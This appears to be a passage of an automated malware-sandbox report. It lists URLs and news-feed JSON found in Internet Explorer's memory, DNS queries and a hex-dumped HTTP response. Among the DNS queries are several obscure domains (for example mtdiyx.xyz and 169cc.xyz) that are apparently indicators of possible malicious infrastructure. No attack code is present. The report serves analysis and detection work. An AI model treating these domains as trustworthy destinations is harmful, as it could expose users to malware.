Guide","logoUrl":"https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAUzf9j.img","profileId":"vid-vddqr9408j0m8pski5v74akh9u9dsgw5h3xasauhrs37menku95a","lightThemeSVGLogo":{"width":68,"height":12,"url":"https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRyR"},"darkThemeSVGLogo":{"width":68,"height":12,"url":"https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRyR-dark"}},"category":"money","reactionSummary":{"totalCount":242,"subReactionSummaries":[{"totalCount":184,"type":"upvote"},{"totalCount":58,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":15,"subCommentSummaries":[{"totalCount":9,"type":"comment"},{"totalCount":6,"type":"reply"}]},"commentStatus":"on","relevanceScore":888.0023,"subscriptionProductType":"undefined","feed":{"id":"Y_9eb0ac10-32bc-43cf-816e-5beaaf524f7a","feedName":"News"},"topics":[{"label":"News","weight":0.6985242366790771,"feedId":"Y_9eb0ac10-32bc-43cf-816e-5beaaf524f7a","locale":"en-us"}],"isWorkNewsContent":false,"ri":"313","recoId":"l9UAE1iUwonWkiPcKb6-CFBPgm","source":"msn"},{"id":"AA1nCym8","type":"video","title":"Top 10 LGBTQIA+ Shows That Were Canceled Too Soon","abstract":"These LGBTQIA+ shows were canceled too soon. Welcome to MsMojo, and today we equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: .http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: msapplication.xml1.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x160ac525,0x01dab001</date><accdate>0x160d27ad,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
          Source: msapplication.xml6.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1619a1f6,0x01dab001</date><accdate>0x161c1774,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
          Source: iexplore.exe, 0000000D.00000002.4165323896.000001BA5D037000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4185614018.000001BA5FDD0000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4185614018.000001BA5FDD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x16280dd2,0x01dab001</date><accdate>0x16280dd2,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000001D.00000002.4236924812.000000000CF98000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Luka Doncic linked up with his former teammate and mentor Dirk Nowitzki before Game 3 of the Western Conference Finals.https://sports.yahoo.com/aces-waive-rookie-dyaisha-fair-after-debut-just-4-games-into-wnba-season-231809202.htmlhttps://www.basketballnetwork.net/old-school/when-shawn-kemp-blasted-sonics-after-they-gave-money-to-noname-center equals www.yahoo.com (Yahoo)
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: URLhttp://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: URLhttp://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: URLhttp://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.facebook.com/favicon.ico equals www.facebook.com (Facebook)
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.facebook.com/w equals www.facebook.com (Facebook)
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myspace.com/favicon.icoX equals www.myspace.com (Myspace)
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rambler.ru/ equals www.rambler.ru (Rambler)
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rambler.ru/favicon.icoGx equals www.rambler.ru (Rambler)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com//00 equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000000D.00000002.4187597827.000001BA61100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/p equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/ue:T equals www.youtube.com (Youtube)
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: s 99-80 win over Caitlin Clark and the Indiana Fever, though she recorded just two assists and shot 0-of-2 from the field in four mi...","readTimeMin":2,"url":"https://sports.yahoo.com/aces-waive-rookie-dyaisha-fair-after-debut-just-4-games-into-wnba-season-231809202.html","locale":"en-us","financeMetadata":{"stocks":[],"sentimentRatings":[{"topic":"wf_sentiment_positive","score":488},{"topic":"wf_sentiment_negative","score":321},{"topic":"wf_sentiment_neutral","score":9190}],"categories":[]},"publishedDateTime":"2024-05-26T23:18:09Z","isFeatured":false,"images":[{"width":3837,"height":3075,"url":"https://th.bing.com/th?id=ORMS.fa403ee24f62097cd53d947328708e8a&pid=Wdp","title":"Dyaisha Fair made her WNBA debut on Saturday night, where she played about four minutes late in their win over the Fever.","caption":"Dyaisha Fair made her WNBA debut on Saturday night, where she played about four minutes late in their win over the Fever. (Ethan Miller/Getty Images)","focalRegion":{"x1":1842,"x2":2070,"y1":243,"y2":471},"source":"msn","colorSamples":[{"isDarkMode":true,"hexColor":"#3D522C"},{"isDarkMode":false,"hexColor":"#3D522C"}]}],"provider":{"id":"BBNTwhO","name":"Yahoo Sports","logoUrl":"https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAW5Llb.img","profileId":"vid-2hws4tpebau2wffkwmy9hyi45w3gxu9mhxfgg07i59i59i2yyxss","lightThemeSVGLogo":{"width":82,"height":12,"url":"https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f4QF"},"darkThemeSVGLogo":{"width":82,"height":12,"url":"https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f4QF-dark"}},"category":"sports","reactionSummary":{"totalCount":23,"subReactionSummaries":[{"totalCount":12,"type":"upvote"},{"totalCount":11,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":1,"subCommentSummaries":[{"totalCount":1,"type":"comment"}]},"commentStatus":"on","relevanceScore":892.0023,"subscriptionProductType":"undefined","feed":{"id":"Y_6675a31a-7b7e-4d7d-bd21-45e917692ab9","feedName":"WNBA"},"topics":[{"label":"WNBA","weight":1.0,"feedId":"Y_6675a31a-7b7e-4d7d-bd21-45e917692ab9","locale":"en-us"},{"label":"NBA","weight":0.949999988079071,"feedId":"Y_15d6406e-7f99-4e5f-9404-93a90865cbaf","locale":"en-us"},{"label":"Sports","weight":0.8103029131889343,"feedId":"Y_b09e3e40-000d-454d-87ef-96631d7c9e7c","locale":"en-us"}],"isWorkNewsContent":false,"ri":"319","recoId":"l9UAE1iUwonWkiPcKb6-CFBPgm","source":"msn"},{"id":"BB1mwwq1","type":"slideshow","title":"This Is What a TSA Agent First Notices About You","abstract":"While it's nice to be noticed, this isn't the kind of attention you want. Here's what to avoid if you want to fly through the airport security check. The post This Is What a TSA Agent First Notices About You appeared first on Reader's Digest.","url":"https://www.rd.com/list/what-tsa-agents-notice-first/","locale":"en-us","galleryItemCount":16,"financeMetadata":{"stocks":[],"sentimentRatings":[{"topic":"wf_sentiment_positive","score":941},{"topic":"wf_sentiment_ne
          Source: global trafficDNS traffic detected: DNS query: www.msn.com
          Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
          Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
          Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
          Source: global trafficDNS traffic detected: DNS query: api.msn.com
          Source: global trafficDNS traffic detected: DNS query: assets.msn.com
          Source: global trafficDNS traffic detected: DNS query: c.msn.com
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.com
          Source: global trafficDNS traffic detected: DNS query: acdn.adnxs.com
          Source: global trafficDNS traffic detected: DNS query: www.mtdiyx.xyz
          Source: global trafficDNS traffic detected: DNS query: www.169cc.xyz
          Source: global trafficDNS traffic detected: DNS query: www.mosaica.online
          Source: global trafficDNS traffic detected: DNS query: www.venitro.com
          Source: global trafficDNS traffic detected: DNS query: www.techn9nehollywoodundead.com
          Source: global trafficDNS traffic detected: DNS query: www.aicashu.com
          Source: global trafficDNS traffic detected: DNS query: www.qieqyt.xyz
          Source: global trafficDNS traffic detected: DNS query: www.tryscriptify.com
          Source: global trafficDNS traffic detected: DNS query: www.naples.beauty
          Source: global trafficDNS traffic detected: DNS query: www.6733633.com
          Source: global trafficDNS traffic detected: DNS query: www.camelpmkrf.com
          Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 06:43:11 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://amazon.fr/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.icom
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://asp.usatoday.com/6
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.icoM
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6A6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://busca.orange.es/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://busca.uol.com.br/(
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico-
